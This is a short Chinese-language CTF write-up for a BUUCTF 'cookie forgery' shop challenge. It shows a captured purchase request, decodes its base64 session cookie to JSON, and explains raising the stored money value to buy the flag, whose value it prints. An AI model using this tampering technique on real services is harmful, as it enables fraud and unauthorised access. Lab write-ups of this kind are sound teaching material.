简单的cookie伪造

简单的cookie伪造

打开页面发现,是一个购买的界面,可以看见第三个是购买flag的,打开页面源码,发现没有什么提示,所以我们点击购买,然后抓包

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST /buy HTTP/1.1
Host: 8075a6af-0656-420b-8689-587fea458b64.node4.buuoj.cn:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
Origin: http://8075a6af-0656-420b-8689-587fea458b64.node4.buuoj.cn:81
Connection: close
Referer: http://8075a6af-0656-420b-8689-587fea458b64.node4.buuoj.cn:81/
Cookie: UM_distinctid=17c472616a335b-0660cc5b8058a1-4c3e2778-186a00-17c472616a43f; session=eyJtb25leSI6IDM3LCAiaGlzdG9yeSI6IFsiWXVtbXkgY2hvY29sYXRlIGNoaXAgY29va2llIiwgIll1bW15IHBlcHBhcmtha2EiLCAiWXVtbXkgY2hvY29sYXRlIGNoaXAgY29va2llIiwgIll1bW15IGNob2NvbGF0ZSBjaGlwIGNvb2tpZSJdfQ==
Upgrade-Insecure-Requests: 1

id=2

发现有一个session字段,且值是base64加密的,所以base64解密后

1
{"money": 37, "history": ["Yummy chocolate chip cookie", "Yummy pepparkaka", "Yummy chocolate chip cookie", "Yummy chocolate chip cookie"]}

因此,我们可以修改37为500,然后伪造cookie中的session字段并提交,得到回馈的seesion字段,我们再base64解密一下即可得flag

1
{"money": 400, "history": ["Yummy chocolate chip cookie", "Yummy pepparkaka", "Yummy chocolate chip cookie", "Yummy chocolate chip cookie", "flag{d1ca8b7e-27c5-415b-a858-0c9d22826c21}\n"]}